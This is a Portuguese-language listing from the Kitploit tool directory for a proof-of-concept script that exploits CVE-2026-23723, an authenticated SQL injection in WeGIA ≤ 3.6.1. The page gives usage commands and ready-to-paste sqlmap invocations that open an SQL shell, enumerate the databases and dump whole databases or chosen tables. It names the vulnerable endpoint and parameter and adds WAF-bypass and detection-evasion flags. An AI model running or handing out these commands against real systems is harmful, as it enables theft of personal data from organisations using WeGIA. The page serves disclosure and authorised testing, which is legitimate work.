Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/ch35h1r3c47/cve-2026-23723-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubch35h1r3c47/cve-2026-23723-poc

CVE-2026-23723-POC

Este é um script auxiliar leve em Python, projetado para automatizar a geração de arquivos PoC compatíveis com sqlmap para a vulnerabilidade de injeção SQL baseada em erro autenticada no WeGIA (≤ 3.6.1), identificada como GHSA-xfmp-2hf9-gfjp.

Ver Repositório
31há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23723 PoC - Auxiliar de Exploração de SQL Injection Autenticada no WeGIA

SQL Injection Autenticada Baseada em Erro no WeGIA ≤ 3.6.1
GHSA-xfmp-2hf9-gfjp | Aviso Oficial

Autor Original do POC / Relator: ViniCastro2001 GHSA Publicado por: nilsonLazarin (mantenedor do projeto)

Este script Python leve automatiza:

  • Login no sistema WeGIA usando credenciais fornecidas
  • Extração de cookie de sessão PHP válido
  • Geração de arquivo de requisição compatível com sqlmap (ponto de injeção marcado como id_memorando=1*)
  • Saída de comandos sqlmap prontos para execução para enumeração, shell interativo e extração de dados

Recursos

  • Tenta múltiplos caminhos de login comuns e nomes de campos de formulário para melhor compatibilidade
  • Gera arquivo de requisição sqlmap (.req)
  • Fornece comandos sqlmap prontos para copiar e colar para:
    • Shell interativo estilo MySQL (--sql-shell)
    • Enumeração de bancos de dados / tabelas
    • Extração de tabela específica ou dump completo do banco de dados

Requisitos

  • Python 3.x
  • Biblioteca requests (a maioria dos ambientes de teste de penetração já a possui)
  • sqlmap instalado e no seu PATH

Instalação

root@kitploit:~
git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC

Uso

root@kitploit:~
# Recomendado: prompt interativo de senha
python CVE-2026-23723.py --url http://target.com -u admin

# Fornecer senha diretamente
python CVE-2026-23723.py --url http://target.com -u admin -p wegia

# Arquivo de saída personalizado
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req

Após a execução bem-sucedida, o script irá:

Tentar o login Gerar wegia_sqlmap.req (ou seu nome de arquivo personalizado) Exibir comandos sqlmap prontos para uso

Exemplo de comandos gerados:

root@kitploit:~
# 1. Shell interativo estilo MySQL (mais recomendado)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb

# 2. Mostrar banco de dados atual e todos os bancos
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch

# 3. Listar tabelas no banco wegia
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch

# 4. Extrair uma tabela específica (exemplo: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch

# 5. Extrair todo o banco wegia (cuidado!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Flags opcionais do sqlmap:

--proxy=http://127.0.0.1:8080 (através de Burp/ZAP)
--tamper=space2comment,randomcase (bypass básico de WAF)
--delay=1 (desacelerar para evitar detecção)

Se o Login Automático Falhar Faça login manualmente via navegador → copie o cabeçalho Cookie completo → execute o sqlmap diretamente:

root@kitploit:~
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
  --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
  --sql-shell --batch

Aviso Legal Este PoC é fornecido apenas para fins educacionais e de teste de penetração autorizado. O uso não autorizado contra qualquer sistema é ilegal e proibido. O autor e os colaboradores não assumem responsabilidade por uso indevido ou qualquer dano causado. Referências

GHSA-xfmp-2hf9-gfjp CVE-2026-23723

Baixar ferramenta